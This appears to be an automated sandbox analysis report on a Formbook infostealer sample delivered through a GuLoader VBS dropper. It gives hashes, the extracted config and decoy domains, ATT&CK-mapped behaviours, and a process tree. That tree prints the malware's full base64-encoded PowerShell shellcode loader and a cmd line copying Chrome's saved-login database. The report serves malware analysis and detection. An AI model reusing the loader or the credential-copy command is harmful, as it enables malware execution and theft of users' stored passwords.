formbook | e76b1a4f9aa3787900758ce81367f40587ca3d6a3a7ab6d1d02537e12cb10c37

General

Target

file673736 241-22 01.02.22.vbs
Size

165KB
MD5

7faf86b2e1bb45a26367227c777dc668
SHA1

74e41c42eb5b04c532567d9244c969f4895ee3ca
SHA256

e76b1a4f9aa3787900758ce81367f40587ca3d6a3a7ab6d1d02537e12cb10c37
SHA512

c9427897cb391da11ee8325cd0ffd8efc7b94b2c46503a1cc4a71bd8497fcdfa42efccba7613b1119329d26b510486fe1c05290726ce06c53b60b1c76ded6427

Score

10^/10

formbook guloader k6sm downloader persistence rat spyware stealer trojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

k6sm

Decoy

mingshengjewelry.com

ontimecleaningenterprise.com

alyssa0.xyz

ptecex.xyz

dukfot.online

pvcpc.com

iowalawtechnology.com

nestletranspotation.com

mysithomes.com

greenlakespaseattle.com

evofishingsystems.com

unilytcs.com

ordemt.com

dentalbatonrouge.com

pictureme360.net

chalinaslacatalana.com

newmirrorimage.xyz

pinklaceandlemonade.com

rapinantes.com

yzicpa.com

Signatures

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Formbook Payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4648-159-0x0000000000400000-0x00000000006A3000-memory.dmp	formbook
behavioral2/memory/4648-160-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral2/memory/4452-166-0x0000000000EC0000-0x0000000000EEF000-memory.dmp	formbook

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

colorcpl.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	colorcpl.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VFSHNFNPIRY = "C:\\Program Files (x86)\\internet explorer\\ieinstal.exe"	colorcpl.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	WScript.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

colorcpl.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	colorcpl.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

ieinstal.exe

pid process

4648 ieinstal.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

4248 powershell.exe
4648 ieinstal.exe

pid	process
4648	ieinstal.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exeieinstal.execolorcpl.exe

description	pid	process	target process
PID 4248 set thread context of 4648	4248	powershell.exe	ieinstal.exe
PID 4648 set thread context of 3024	4648	ieinstal.exe	Explorer.EXE
PID 4452 set thread context of 3024	4452	colorcpl.exe	Explorer.EXE

Drops file in Windows directory 8 IoCs

Processes:

svchost.exeTiWorker.exe

description	ioc	process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe
File opened for modification	C:\Windows\WinSxS\pending.xml	TiWorker.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

colorcpl.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	colorcpl.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

powershell.exeieinstal.execolorcpl.exe

pid	process
4248	powershell.exe
4248	powershell.exe
4648	ieinstal.exe
4648	ieinstal.exe
4648	ieinstal.exe
4648	ieinstal.exe
4452	colorcpl.exe
4452	colorcpl.exe
4452	colorcpl.exe
4452	colorcpl.exe
4452	colorcpl.exe
4452	colorcpl.exe
4452	colorcpl.exe
4452	colorcpl.exe
4452	colorcpl.exe
4452	colorcpl.exe

Suspicious behavior: MapViewOfSection 9 IoCs

Processes:

powershell.exeieinstal.execolorcpl.exe

pid	process
4248	powershell.exe
4248	powershell.exe
4648	ieinstal.exe
4648	ieinstal.exe
4648	ieinstal.exe
4452	colorcpl.exe
4452	colorcpl.exe
4452	colorcpl.exe
4452	colorcpl.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exesvchost.exeTiWorker.exe

description	pid	process
Token: SeDebugPrivilege	4248	powershell.exe
Token: SeShutdownPrivilege	2272	svchost.exe
Token: SeCreatePagefilePrivilege	2272	svchost.exe
Token: SeShutdownPrivilege	2272	svchost.exe
Token: SeCreatePagefilePrivilege	2272	svchost.exe
Token: SeShutdownPrivilege	2272	svchost.exe
Token: SeCreatePagefilePrivilege	2272	svchost.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe
Token: SeBackupPrivilege	1280	TiWorker.exe
Token: SeRestorePrivilege	1280	TiWorker.exe
Token: SeSecurityPrivilege	1280	TiWorker.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

WScript.exepowershell.execsc.exeExplorer.EXEcolorcpl.exe

description	pid	process	target process
PID 4088 wrote to memory of 4248	4088	WScript.exe	powershell.exe
PID 4088 wrote to memory of 4248	4088	WScript.exe	powershell.exe
PID 4088 wrote to memory of 4248	4088	WScript.exe	powershell.exe
PID 4248 wrote to memory of 3460	4248	powershell.exe	csc.exe
PID 4248 wrote to memory of 3460	4248	powershell.exe	csc.exe
PID 4248 wrote to memory of 3460	4248	powershell.exe	csc.exe
PID 3460 wrote to memory of 504	3460	csc.exe	cvtres.exe
PID 3460 wrote to memory of 504	3460	csc.exe	cvtres.exe
PID 3460 wrote to memory of 504	3460	csc.exe	cvtres.exe
PID 4248 wrote to memory of 1300	4248	powershell.exe	ieinstal.exe
PID 4248 wrote to memory of 1300	4248	powershell.exe	ieinstal.exe
PID 4248 wrote to memory of 1300	4248	powershell.exe	ieinstal.exe
PID 4248 wrote to memory of 4648	4248	powershell.exe	ieinstal.exe
PID 4248 wrote to memory of 4648	4248	powershell.exe	ieinstal.exe
PID 4248 wrote to memory of 4648	4248	powershell.exe	ieinstal.exe
PID 4248 wrote to memory of 4648	4248	powershell.exe	ieinstal.exe
PID 3024 wrote to memory of 4452	3024	Explorer.EXE	colorcpl.exe
PID 3024 wrote to memory of 4452	3024	Explorer.EXE	colorcpl.exe
PID 3024 wrote to memory of 4452	3024	Explorer.EXE	colorcpl.exe
PID 4452 wrote to memory of 1988	4452	colorcpl.exe	cmd.exe
PID 4452 wrote to memory of 1988	4452	colorcpl.exe	cmd.exe
PID 4452 wrote to memory of 1988	4452	colorcpl.exe	cmd.exe
PID 4452 wrote to memory of 4512	4452	colorcpl.exe	Firefox.exe
PID 4452 wrote to memory of 4512	4452	colorcpl.exe	Firefox.exe
PID 4452 wrote to memory of 4512	4452	colorcpl.exe	Firefox.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file673736 241-22 01.02.22.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBIAGoAbABwADIAIABvAHIAZABpAG4AcgBzAGsAbgAgAEsATwBOAFYAIABEAEkAUwBDAEkAIABwAHIAZQBkAGUAdABlAHMAIABUAGUAZwBuAG0AcwAgAGQAZQBpAG4AYwByACAAQgBSAE8AQQBEAEUATgBJAE4ARwAgAEMAQQBQAEUAUgBOAE8AIABGAHIAYQBnAG0AZQA3ACAAUwBrAG0AbQAgAEYAbwByAGIAZQBoAG8AIABIAEEATABTAEgAVgAgAEoAaQBiAGUAZABzAHcAIABiAGUAZgBhAG0AbABpACAAVQBOAEMASABSAEkAUwAgAFIAbwBzAGsAaQBsAGQAZQBuAHMAOQAgAGEAdgBsAHMAIAB1AGQAcgBlAGQAIABSAEUAUABSAEUASABFACAAWQBtAHAAbgBpAG4AIABkAHUAcwB0AHMAaABlAGUAIABQAGEAcgBvACAARQBsAGUAYQAgAFUAbgBkAGUAcgA5ACAATQBvAHQAaQB2AGUAdAAzACAAdABhAGsAdABlAHIAaQBuACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAFUAUABFAFIAUABSAEUARABJADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABTAFUAUABFAFIAUABSAEUARABJADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAGQAaQBzAGIAcgBhACwAaQBuAHQAIABPAGwAZAB0AGkALAByAGUAZgAgAEkAbgB0ADMAMgAgAFMAVQBQAEUAUgBQAFIARQBEAEkALABpAG4AdAAgAFAAcgBlAGMAdQByAHIAaQBjAHUALABpAG4AdAAgAFMAVQBQAEUAUgBQAFIARQBEAEkANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABWAGkAbABkAGgAZQBkAG8AbgB5ACwAdQBpAG4AdAAgAFMAUABFAFIATQBJAEUAVABGAEUALABpAG4AdAAgAFAAQQBSAEEAVAAsAGkAbgB0ACAAUwBVAFAARQBSAFAAUgBFAEQASQAwACwAaQBuAHQAIABFAHYAbwBrAGUAcgBzAGsALABpAG4AdAAgAEEARQBDAEkATwAsAGkAbgB0ACAAUwBzAHQAdABlAG4AZAAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAE8AbABkAHQAaQAwACwAdQBpAG4AdAAgAE8AbABkAHQAaQAxACwASQBuAHQAUAB0AHIAIABPAGwAZAB0AGkAMgAsAHIAZQBmACAASQBuAHQAMwAyACAATwBsAGQAdABpADMALABpAG4AdAAgAE8AbABkAHQAaQA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBBACgASQBuAHQAUAB0AHIAIABPAGwAZAB0AGkANQAsAGkAbgB0ACAATwBsAGQAdABpADYALABpAG4AdAAgAE8AbABkAHQAaQA3ACwAaQBuAHQAIABPAGwAZAB0AGkAOAAsAGkAbgB0ACAATwBsAGQAdABpADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAbwBsAGkAdgBhAGMAZQAgAFMAawBvAHIAcABlAHMAIABEAHcAYQByAGYAIABGAGwAeQB2ADYAIABQAGwAZQB0AGYAcgBpAGUAMwAgAGEAawB2AGEAdABpAG4AIABiAG8AYQByACAAQgBvAG0AYgBlAHIAZQAgAEEAYgB1AG0AYgAyACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBtAGQAaQBnAG8AbwBnAGUAbgB5ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFIAZQBrAHUAcgBzAGkAbwBuAHMAIgAgAA0ACgAkAFMAVQBQAEUAUgBQAFIARQBEAEkAMwA9ADAAOwANAAoAJABTAFUAUABFAFIAUABSAEUARABJADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAUwBVAFAARQBSAFAAUgBFAEQASQA4AD0AWwBTAFUAUABFAFIAUABSAEUARABJADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdACQAUwBVAFAARQBSAFAAUgBFAEQASQAzACwAMAAsAFsAcgBlAGYAXQAkAFMAVQBQAEUAUgBQAFIARQBEAEkAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAEcAdQBtAG0AMwAgAEEAbgB0AGkANgAgAGgAdgBlAHAAcwBlAG4AZQBzAGkAIAByAGUAYwBlAHAAdAAgAFAAcgBvAHQAZQBzAHQAMwAgAGEAcABwAG8AaQBuAHQAcwBsACAARABFAEwAUABMACAASABBAFYAQQBBAEwAUAAgAHIAdQBiAGkAYwAgAHIAaQBuAGcAZQBsACAATwB2AGUAcgBsAG8AZwBpAGMAYQA0ACAAZgBhAHIAbABpACAATgBhAHIAcgBlAHIAaQA3ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAGgAZQB0AGkAdgBlAHUAbgA3ACIAIAANAAoAJABTAFUAUABFAFIAUABSAEUARABJADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEEAawB0AGkAdgBzAGcAZQBtAC4AZABhAHQAIgANAAoAIwBUAGkAcwBzAGUAdAAgAEkAYgBsAGEAbgAgAFMAYQBsAHYAIABFAG4AYwBlACAAUwBwAGUAagBsAGsAYQBiAGkAIABTAGoAdQBzAHMANgAgAE8ATQBTAFQATgBJAE4ARwBTAEEAIABuAG8AbgBhAHMAYwBlAHQAaQBjACAATgBPAE4AUAAgAFMAdABpAG4AMwAgAA0ACgAkAFMAVQBQAEUAUgBQAFIARQBEAEkANAA9AFsAUwBVAFAARQBSAFAAUgBFAEQASQAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQAUwBVAFAARQBSAFAAUgBFAEQASQAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAE0AaQBzAG0AbwB2ACAARgBvAHIAcwByADUAIABMAGUAZwBpAHQAaQAgAEsAQQBUAEgATABJAE4AUwAgAFAAUgBPAEIATwBTAEMARQBTACAAUAByAG0AaQBlAG8AYgBsAGkAIABoAHIAZQBuAGQAZQBiACAAZgBhAGcAZwByAHUAcABwAGUAIABGAGkAeABpAHQAaABlAG4AZAAgAGEAbAB5AGMAbwAgAE4AbwBuAGQAIABTAGEAZABsAGUAcgBmAGEAdQBuACAAVABhAGsAdAByAGUAZwB1AGwAIABFAEQARwBFAE0AQQBOAEwAIABuAG8AbgBwACAAbQBlAHQAZQBvAHIAbwBsACAAUgBhAGIAYgBpAHQANwAgAFMATwBUAFQASQAgAEEAcgBnAHUAcwBqAGUAdABoADUAIABHAGEAcgBkAGUAcgA3ACAAUABsAGEAYwBpAGQAZwB1ADgAIABDAGgAYQBnAHIAaQBuAG4AZQA1ACAAVQBOAFcATwAgAHIAbgB0AGcAZQBuAGIAbABpAGsAIABmAGwAbwByAGkAcwAgAEIAaQBmAGkAZwA0ACAASABZAEcAUgBPACAATgBvAGcAZwBpAG4AZwBzADMAIABIAEkATABTAEUATgAgAFcAQQBTAEgAVABVACAAUAByAG8AdABvAGMAaQB0AGkAegAgAE8AdgBlAHIAcQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATgBJAFQAUgAiACAADQAKACQAUwBVAFAARQBSAFAAUgBFAEQASQA1AD0AMAA7AA0ACgAjAGQAZQBjAGEAeQBlAGQAIABDAGEAcgB0AG0AYQBuAHUAbgBkADQAIABLAFUAUwBPAE4AIABzAHUAYwBjAGUAcwAgAGYAbwByAHYAYQBuACAAVgBpAHIAdAB1AG8AMgAgAFIAZQBkAGkAZwBlAHIAaQBuAGcAIABEAEUATABJAEsAQQBUAEUAIABVAG4AYwBvAGcAbgBpAHoAYQBuACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBUAE8AVABFAEsAUwAiACAADQAKAFsAUwBVAFAARQBSAFAAUgBFAEQASQAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQAUwBVAFAARQBSAFAAUgBFAEQASQA0ACwAJABTAFUAUABFAFIAUABSAEUARABJADMALAA2ADYANQA3ADIALABbAHIAZQBmAF0AJABTAFUAUABFAFIAUABSAEUARABJADUALAAwACkADQAKACMATQBnAGwAZQByADUAIABTAFQASQBMAEEAIABzAGsAbgBkAGkAZwBoACAARgBsAHMAdQBiAGUAcQB1AGEAdAA0ACAAZQBzAHAAcgBlAHMAcwBpAHYAIABQAHIAbwBnAHIAYQBtAG0AZQAgAE4AbwBuAGYAOAAgAFAAUgBJAE4AQwBJAFAAIABCAGUAcgBuAHMAZwAgAGsAcgBhAHMAcwBlAHMAbwBjAGMAIABiAGEAZABnAGUAcgBpACAAUgBlAGoAcwBlAG4AZABlAHkAIAByAGUAcwB0AGEAZwBlAHIAIABzAGEAbQBzAGUAbgBkAGkAbgBnACAAQgByAHUAZwA1ACAAUABhAHAAaQByACAAUwBPAEMASQAgAEEAZABnAGEAbgBnAHMAZgBvAHIAIABLAHIAYQB0AG8AZwBlAG4AaQAxACAAawBpAG4AawAgAEsAVgBJAEsAUwAgAEsAUgBWAEUAUwBLAEUATABUAEkAIABTAGsAcgB2AGUAYgBhAG4AZQByACAARQBuAHQAcgBlAHAAcgAgAFAAbABhAG4AZQB0ADMAIABTAEwAQQBUACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAE8ATgBGAEkAUwBLACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEQARABDAEEARABFAE4ATwBDAEEAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAQQBuAHIAZQB0AHQAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBNAEEATABKAEUAUgBJACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYAZQB0AGkAcwA1ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEwAdQBkAGUAcgBrAGEAcgBsACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEEAcwBjAGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBOAGUAYwBlAHMAcwBpADUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAYgB1AHIAZwBhAG0AbwB0AGEAbQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBnAHIAbwB1AHMAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBOAGEAdAB1AHIAawByAGEAZgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAEEAUgBGAEEAUgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAEkARQBTAEgATwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBSAEEATQBTAEwARwBEAFIAIgAgAA0ACgBbAFMAVQBQAEUAUgBQAFIARQBEAEkAMQBdADoAOgBDAGEAbABsAFcAaQBuAGQAbwB3AFAAcgBvAGMAQQAoACQAUwBVAFAARQBSAFAAUgBFAEQASQAzACwAIAAwACwAMAAsADAALAAwACkADQAKAA0ACgA="
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4248

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\avb3dpw4\avb3dpw4.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:3460

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE01C.tmp" "c:\Users\Admin\AppData\Local\Temp\avb3dpw4\CSC3FE647F9E3A84EA4A4E5469C4CDF1E48.TMP"
4⤵
PID:504

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
3⤵
PID:1300

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
3⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4648

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of WriteProcessMemory
PID:3024

C:\Windows\SysWOW64\colorcpl.exe
"C:\Windows\SysWOW64\colorcpl.exe"
2⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4452

C:\Windows\SysWOW64\cmd.exe
/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
3⤵
PID:1988

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:4512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2272

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1280

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

2

T1060

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Aktivsgem.dat
MD5
b8fb4faef24302dcfac6cc1a885b1ec2

SHA1
9c14c95107f054c0bfc77243cb99aa57fe3f9bd1

SHA256
9ba5694976d1254b451bc1be9495049fba0421e65d1ccf23fb2c39a2d4f531f0

SHA512
e0506ecdb5fcfcb32e0f32167c30a7daa03e572eb514db96661709751c161f85f265a6f98ce2c2e03aa2cf1a80dbcba489614e7923aa2f7e7fc629b068ef41d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\DB1
MD5
b608d407fc15adea97c26936bc6f03f6

SHA1
953e7420801c76393902c0d6bb56148947e41571

SHA256
b281ce54125d4250a80f48fcc02a8eea53f2c35c3b726e2512c3d493da0013bf

SHA512
cc96ddf4bf90d6aaa9d86803cb2aa30cd8e9b295aee1bd5544b88aeab63dc60bb1d4641e846c9771bab51aabbfbcd984c6d3ee83b96f5b65d09c0841d464b9e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE01C.tmp
MD5
a3ecd28106cca394cba7579fc9e84b57

SHA1
2c9c5708b24b828e76185dacb549b5f0c4d41efd

SHA256
da5ff9f640f9485e28acf160f4d1d849037b1546a3ae4be31799893d21a01a7f

SHA512
79dd9860fda9e92306d83d9a2d9dd56b41f1cb6fa75e080b5409025a41c87c5a6199e7cf3ed029dc03d63448453aa2ef2c6059af29fa5cfcd833171e04262cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\avb3dpw4\avb3dpw4.dll
MD5
71cd14449e53eb22c5c76e6aa7ade0b6

SHA1
ecfbd9f40a06334aa79b7bf8c67cd0647910967c

SHA256
ace9ff29f24190093742234c8871955bee2864b39729ed0b7d3dc397567d7f89

SHA512
00a471d42c9c7675f0a140ef12486525d2ac161724151ac39db80709eab37c35de69aedd67a673d49cf05421260b3f596891c67e0256520dff4df85a86676c30

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\avb3dpw4\CSC3FE647F9E3A84EA4A4E5469C4CDF1E48.TMP
MD5
2e53da9eedde3a261a6e07d633598a3e

